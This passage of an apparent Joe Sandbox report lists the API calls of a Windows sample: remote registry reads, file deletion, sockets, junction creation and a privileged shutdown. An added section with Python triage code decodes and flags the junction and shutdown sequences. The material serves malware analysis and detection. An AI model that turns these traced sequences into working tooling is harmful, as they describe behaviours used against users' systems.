                                                                  • Instruction ID: aefd0f7892b6046c19d5a4cb827da4802101f26eccf664da7729c5749153f364
                                                                  • Opcode Fuzzy Hash: 07b82849b9a989cb93c13bc616b3f9b11a5e61cceabbd97a02445724541294e9
                                                                  • Instruction Fuzzy Hash: 793112715002596BCF14AFE4EC09AEE77EF9F45324F1401A5E810E7290EB31DF858AA5
                                                                  APIs
                                                                    • Part of subcall function 006AD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,006AC10E,?,?), ref: 006AD415
                                                                    • Part of subcall function 006AD3F8: _wcslen.LIBCMT ref: 006AD451
                                                                    • Part of subcall function 006AD3F8: _wcslen.LIBCMT ref: 006AD4C8
                                                                    • Part of subcall function 006AD3F8: _wcslen.LIBCMT ref: 006AD4FE
                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006AC99E
                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 006ACA09
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 006ACA2D
                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 006ACA8C
                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 006ACB47
                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 006ACBB4
                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 006ACC49
                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 006ACC9A
                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 006ACD43
                                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 006ACDE2
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 006ACDEF
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                   • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                  • String ID:
                                                                  • API String ID: 3102970594-0
                                                                  • Opcode ID: 2b6ddaec427828df73c8b4f69784bc20e92e163edf59012939096ecd94bd361c
                                                                  • Instruction ID: 007ce68473e3d749bd55a9cfc4ece862d5eb0416adb49c932c088bfb05a8c36e
                                                                  • Opcode Fuzzy Hash: 2b6ddaec427828df73c8b4f69784bc20e92e163edf59012939096ecd94bd361c
                                                                  • Instruction Fuzzy Hash: 4A024D716046109FC714EF24C891E6ABBE6EF49314F1884ADF84ACB2A2D731EC42CF51
                                                                  APIs
                                                                    • Part of subcall function 00625851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006255D1,?,?,00664B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00625871
                                                                    • Part of subcall function 0068EAB0: GetFileAttributesW.KERNEL32(?,0068D840), ref: 0068EAB1
                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 0068D9CD
                                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0068DA88
                                                                  • MoveFileW.KERNEL32(?,?), ref: 0068DA9B
                                                                  • DeleteFileW.KERNEL32(?,?,?,?), ref: 0068DAB8
                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 0068DAE2
                                                                    • Part of subcall function 0068DB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0068DAC7,?,?), ref: 0068DB5D
                                                                  • FindClose.KERNEL32(00000000,?,?,?), ref: 0068DAFE
                                                                  • FindClose.KERNEL32(00000000), ref: 0068DB0F
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                   • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                  • String ID: \*.*
                                                                  • API String ID: 1946585618-1173974218
                                                                  • Opcode ID: dbf02b47f7782977b39d2b1df8304e051cc2774c2b838e59bd80e3dd01c7b12d
                                                                  • Instruction ID: c9da7c015e3b5599c1fc00465c40aef68fd90c8875d7be3c832612ee76a0c60b
                                                                  • Opcode Fuzzy Hash: dbf02b47f7782977b39d2b1df8304e051cc2774c2b838e59bd80e3dd01c7b12d
                                                                  • Instruction Fuzzy Hash: CA616C7180155DAECF45FBA0DA929EDB7B6AF14300F2042A9E402B7291EB716F09CF64
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                   • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                  • String ID:
                                                                  • API String ID: 1737998785-0
                                                                  • Opcode ID: 55ce5cec3fa3aa860ce40c002d03162ca7872b107ff6f93dc9af185546cf1582
                                                                  • Instruction ID: 1f531407869a55fe7c6071664d5e4add0e294111fd459a7c59d4fb9c010d0751
                                                                  • Opcode Fuzzy Hash: 55ce5cec3fa3aa860ce40c002d03162ca7872b107ff6f93dc9af185546cf1582
                                                                  • Instruction Fuzzy Hash: F641BC71604611AFDB50CF14E888B55BBEAEF04318F15C1A8E819CFB62DB35ED82CB90
                                                                  APIs
                                                                    • Part of subcall function 00682010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0068205A
                                                                    • Part of subcall function 00682010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00682087
                                                                    • Part of subcall function 00682010: GetLastError.KERNEL32 ref: 00682097
                                                                  • ExitWindowsEx.USER32(?,00000000), ref: 0068F249
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                   • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                  • String ID: $ $@$SeShutdownPrivilege
                                                                  • API String ID: 2234035333-3163812486
                                                                  • Opcode ID: f67cc99966e87be33b892fa467fec6f5fb090248f573824d29ec0d25083bb729
                                                                  • Instruction ID: 091c4246937aa469765bc2efc643360880be69fd84ca6bb5cf2a439aaa747217
                                                                  • Opcode Fuzzy Hash: f67cc99966e87be33b892fa467fec6f5fb090248f573824d29ec0d25083bb729
                                                                  • Instruction Fuzzy Hash: 1E01DB7A6502106BEB5477F89C95BFA726E9B08344F150735FD02E62D1D6605E419360
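Two of the listings above are worth decoding by hand. In the routine at 00694785..006948B0, CreateFileW is called with dwDesiredAccess 40000000 (GENERIC_WRITE), dwCreationDisposition 00000003 (OPEN_EXISTING) and dwFlagsAndAttributes 02200000 (FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT), and the resulting handle goes to DeviceIoControl with control code 000900A4 (FSCTL_SET_REPARSE_POINT); together with the \??\%s string from the same routine, that is the sequence that turns a freshly created directory into an NTFS junction or symbolic link. In the routine at 0068F249, a subcall looks up and adjusts a token privilege (SeShutdownPrivilege appears among that routine's strings) before ExitWindowsEx is called. The Python below is an example added for this page, not code from Joe Sandbox or from the sample: it parses the report's "• API.MODULE(args), ref: ADDR" lines (including the "Part of subcall function" prefix and lines without an argument list), decodes the CreateFileW flags and the IOCTL, and flags both sequences. The Win32 constant values are the documented ones; the finding labels, helper names and the generic IOCTL decoding format are this example's own choices, and the two input blocks are copied from the listings above.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Matches the report's call lines, e.g. "• CreateFileW.KERNEL32(?,40000000,...), ref: 00694803",
# "• _wcslen.LIBCMT ref: 006947B2" and "• Part of subcall function 00682010: GetLastError.KERNEL32 ref: 00682097".
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)

# Documented Win32 values (not taken from the report).
FILE_FLAG_BACKUP_SEMANTICS = 0x02000000
FILE_FLAG_OPEN_REPARSE_POINT = 0x00200000
FILE_ATTRIBUTE_NORMAL = 0x00000080
FSCTL_SET_REPARSE_POINT = 0x000900A4
CREATE_FILE_FLAG_NAMES = {
    FILE_FLAG_BACKUP_SEMANTICS: "FILE_FLAG_BACKUP_SEMANTICS",
    FILE_FLAG_OPEN_REPARSE_POINT: "FILE_FLAG_OPEN_REPARSE_POINT",
    FILE_ATTRIBUTE_NORMAL: "FILE_ATTRIBUTE_NORMAL",
}
FSCTL_NAMES = {FSCTL_SET_REPARSE_POINT: "FSCTL_SET_REPARSE_POINT",
               0x000900A8: "FSCTL_GET_REPARSE_POINT", 0x000900AC: "FSCTL_DELETE_REPARSE_POINT"}

@dataclass
class Call:
    api: str
    module: str
    args: List[object]               # int for hex tokens, None for '?', str for literals like *.*
    ref: int                         # call-site address
    subcall_of: Optional[str] = None

def parse_arg(token: str):
    token = token.strip()
    if token == "?":                 # value not recoverable statically
        return None
    return int(token, 16) if re.fullmatch(r"[0-9A-F]{8}", token) else token

def parse_block(text: str) -> List[Call]:
    """Keep only call lines; headers, hashes and memory-dump lines are skipped."""
    calls = []
    for m in filter(None, map(API_LINE.match, text.splitlines())):
        args = [] if m["args"] is None else [parse_arg(a) for a in m["args"].split(",")]
        calls.append(Call(m["api"], m["mod"], args, int(m["ref"], 16), m["sub"]))
    return calls

def decode_create_file_flags(value: int) -> List[str]:
    names = [n for bit, n in CREATE_FILE_FLAG_NAMES.items() if value & bit]
    rest = value & ~sum(CREATE_FILE_FLAG_NAMES)
    return names + ([f"0x{rest:08X}"] if rest else [])

def decode_ioctl(code: int) -> str:
    """CTL_CODE layout: device type (16 bits) | access (2) | function (12) | method (2)."""
    return FSCTL_NAMES.get(code, f"device=0x{code >> 16:X} function={(code >> 2) & 0xFFF} method={code & 3}")

def triage(calls: List[Call]) -> List[str]:
    """Flag the two sequences discussed above; the labels are this example's own."""
    findings, reparse_handle_opened, privilege_adjusted = [], False, False
    both = FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT
    for c in calls:
        if c.api == "CreateFileW" and len(c.args) >= 6 and isinstance(c.args[5], int):
            reparse_handle_opened |= (c.args[5] & both) == both
        elif c.api == "DeviceIoControl" and reparse_handle_opened and len(c.args) >= 2:
            if c.args[1] == FSCTL_SET_REPARSE_POINT:
                findings.append(f"ntfs_reparse_point_set@{c.ref:08X}")
        elif c.api == "AdjustTokenPrivileges":
            privilege_adjusted = True
        elif c.api == "ExitWindowsEx" and privilege_adjusted:
            findings.append(f"shutdown_after_privilege_adjust@{c.ref:08X}")
    return findings

# Input copied verbatim from the two listings above.
REPARSE_BLOCK = """\
• GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00694785
• _wcslen.LIBCMT ref: 006947B2
• CreateDirectoryW.KERNEL32(?,00000000), ref: 006947E2
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00694803
• RemoveDirectoryW.KERNEL32(?), ref: 00694813
• DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0069489A
• CloseHandle.KERNEL32(00000000), ref: 006948A5
• CloseHandle.KERNEL32(00000000), ref: 006948B0
"""
SHUTDOWN_BLOCK = """\
  • Part of subcall function 00682010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0068205A
  • Part of subcall function 00682010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00682087
  • Part of subcall function 00682010: GetLastError.KERNEL32 ref: 00682097
• ExitWindowsEx.USER32(?,00000000), ref: 0068F249
"""

if __name__ == "__main__":
    for block in (REPARSE_BLOCK, SHUTDOWN_BLOCK):
        calls = parse_block(block)
        for c in calls:
            if c.api == "CreateFileW":
                print(f"{c.ref:08X} CreateFileW flags = {decode_create_file_flags(c.args[5])}")
            elif c.api == "DeviceIoControl":
                print(f"{c.ref:08X} DeviceIoControl = {decode_ioctl(c.args[1])}")
        print("findings:", triage(calls))
```

The calls are listed by call-site address, so the parser keeps them in that order and the triage only requires that the reparse-point open precede the ioctl in the listing; an argument shown as "?" is kept as None rather than guessed, which is why the ExitWindowsEx finding does not claim whether a shutdown or a reboot is requested.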
                                                                  APIs
                                                                  • DefDlgProcW.USER32(?,?), ref: 0062233E
                                                                  • GetSysColor.USER32(0000000F), ref: 00622421
                                                                  • SetBkColor.GDI32(?,00000000), ref: 00622434
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                   • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Color$Proc
                                                                  • String ID: (o
                                                                  • API String ID: 929743424-1684096767
                                                                  • Opcode ID: 94eaa2db02fad52f2cc0b932d7df3d4a1d3b6db9e0321ec7e49df9d38ec52e1c
                                                                  • Instruction ID: 057563e8f393be9d002e7069b7fcb4735725cb9e6fedbae314c90fa8b83fcb57
                                                                  • Opcode Fuzzy Hash: 94eaa2db02fad52f2cc0b932d7df3d4a1d3b6db9e0321ec7e49df9d38ec52e1c
                                                                  • Instruction Fuzzy Hash: C781C9F0104835BDE229AA39ACA9EFF2A5FEB42300F15011DF102D6795C9599F43DA7A
                                                                  APIs
                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,006656C2,?,?,00000000,00000000), ref: 00693A1E
                                                                  • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,006656C2,?,?,00000000,00000000), ref: 00693A35
                                                                  • LoadResource.KERNEL32(?,00000000,?,?,006656C2,?,?,00000000,00000000,?,?,?,?,?,?,006266CE), ref: 00693A45
                                                                  • SizeofResource.KERNEL32(?,00000000,?,?,006656C2,?,?,00000000,00000000,?,?,?,?,?,?,006266CE), ref: 00693A56
                                                                  • LockResource.KERNEL32(006656C2,?,?,006656C2,?,?,00000000,00000000,?,?,?,?,?,?,006266CE,?), ref: 00693A65
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                   • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                  • String ID: SCRIPT
                                                                  • API String ID: 3051347437-3967369404
                                                                  • Opcode ID: aabb42346bb1dd00a4b941cb660da7e72649039407c558146f5105a93ae2a979
                                                                  • Instruction ID: 275109d49407235aec60b340821df72a8d8ee3c6c08bd80c3a34bf1b72b57d63
                                                                  • Opcode Fuzzy Hash: aabb42346bb1dd00a4b941cb660da7e72649039407c558146f5105a93ae2a979
                                                                  • Instruction Fuzzy Hash: 50118EB0200741BFDB218F25DC48F677BBEEBC5B51F14426CB502DA650EB71DD008620
                                                                  APIs
                                                                    • Part of subcall function 00681900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00681916
                                                                    • Part of subcall function 00681900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00681922
                                                                    • Part of subcall function 00681900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00681931
                                                                    • Part of subcall function 00681900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00681938
                                                                    • Part of subcall function 00681900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0068194E
                                                                  • GetLengthSid.ADVAPI32(?,00000000,00681C81), ref: 006820FB
                                                                  • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00682107
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0068210E
                                                                  • CopySid.ADVAPI32(00000000,00000000,?), ref: 00682127
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,00681C81), ref: 0068213B
                                                                  • HeapFree.KERNEL32(00000000), ref: 00682142
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                   • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                  • String ID:
                                                                  • API String ID: 3008561057-0
                                                                  • Opcode ID: f70b5552cafcef2ebec3c3a8b1bd6fa15305d812bfdda462359e52c3fa75efd7
                                                                  • Instruction ID: 9bc1688c8de88cd0c5414ba14c1fab2c7b5d06c0cd98e5edc58f345eeea988df
                                                                  • Opcode Fuzzy Hash: f70b5552cafcef2ebec3c3a8b1bd6fa15305d812bfdda462359e52c3fa75efd7
                                                                  • Instruction Fuzzy Hash: FE11ACB1500206FFDB14AF64CC1DBAE7BBBFF45355F244218EA81AB220D7359981CB60
                                                                  APIs
                                                                    • Part of subcall function 0062B329: _wcslen.LIBCMT ref: 0062B333
                                                                  • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 0069A5BD
                                                                  • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 0069A6D0
                                                                    • Part of subcall function 006942B9: GetInputState.USER32 ref: 00694310
                                                                    • Part of subcall function 006942B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006943AB
                                                                  • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 0069A5ED
                                                                  • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 0069A6BA
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                   • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                  • String ID: *.*
                                                                  • API String ID: 1972594611-438819550
                                                                  • Opcode ID: 647bb936f832217dfccb9de637da1681654907f83afe46d132495e558e252f61
                                                                  • Instruction ID: 3c818952436c0f78d2efa0e4149763bbd1fb3ca896d9df6c09f9c6626722ee9b
                                                                  • Opcode Fuzzy Hash: 647bb936f832217dfccb9de637da1681654907f83afe46d132495e558e252f61
                                                                  • Instruction Fuzzy Hash: 9341747190020A9FDF55DFA4D845AEE7BFAEF05310F144159F505A6291EB309E84CFA1
                                                                  APIs
                                                                    • Part of subcall function 006A3AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 006A3AD7
                                                                    • Part of subcall function 006A3AAB: _wcslen.LIBCMT ref: 006A3AF8
                                                                  • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 006A22BA
                                                                  • WSAGetLastError.WSOCK32 ref: 006A22E1
                                                                  • bind.WSOCK32(00000000,?,00000010), ref: 006A2338
                                                                  • WSAGetLastError.WSOCK32 ref: 006A2343
                                                                  • closesocket.WSOCK32(00000000), ref: 006A2372
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                  • String ID:
                                                                  • API String ID: 1601658205-0
                                                                  • Opcode ID: ab911b11bd44bc9fd7b6a1b61f56a05d5e93ceb358570602f983edeb69732155
                                                                  • Instruction ID: a4bc1cda52bf75abfcf27cd28348f01cc027bf75afc59d39c28d0c8cdc5caa94
                                                                  • Opcode Fuzzy Hash: ab911b11bd44bc9fd7b6a1b61f56a05d5e93ceb358570602f983edeb69732155
                                                                  • Instruction Fuzzy Hash: 3B51F371A40210AFEB10AF28D886F6A77E6AB46318F04809CF9455F3C3C775AD428FE5
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                  • String ID:
                                                                  • API String ID: 292994002-0
                                                                  • Opcode ID: e8b6e4c194b29339ded278cd227572513cec1bbd6b188bf094607c0de07d8c72
                                                                  • Instruction ID: fde033f218695681185cae498c7753a804a8e3d961e6ff480285134b2c743199
                                                                  • Opcode Fuzzy Hash: e8b6e4c194b29339ded278cd227572513cec1bbd6b188bf094607c0de07d8c72
                                                                  • Instruction Fuzzy Hash: 3921B1B57002129FD7219F26C864BDA7BE6EF85314F18807CE8498B351DB71EC82CB99
                                                                  APIs
                                                                  • InternetReadFile.WININET(?,?,00000400,?), ref: 0069D8CE
                                                                  • GetLastError.KERNEL32(?,00000000), ref: 0069D92F
                                                                  • SetEvent.KERNEL32(?,?,00000000), ref: 0069D943
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorEventFileInternetLastRead
                                                                  • String ID:
                                                                  • API String ID: 234945975-0
                                                                  • Opcode ID: 5a32eb40dec6beb4bbb88f83f97f663bd4d5169d7265c26fc640c0a989c6a091
                                                                  • Instruction ID: e8266c0fa50e52a9cc6a88358711db1ce80353d6aa6f58f0074397cac597c167
                                                                  • Opcode Fuzzy Hash: 5a32eb40dec6beb4bbb88f83f97f663bd4d5169d7265c26fc640c0a989c6a091
                                                                  • Instruction Fuzzy Hash: E821C1B1500705EFEB30AF65C844BAA77FEEB41314F10443DE64692682E770EA45CB50
                                                                  APIs
                                                                  • lstrlenW.KERNEL32(?,006646AC), ref: 0068E482
                                                                  • GetFileAttributesW.KERNEL32(?), ref: 0068E491
                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 0068E4A2
                                                                  • FindClose.KERNEL32(00000000), ref: 0068E4AE
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
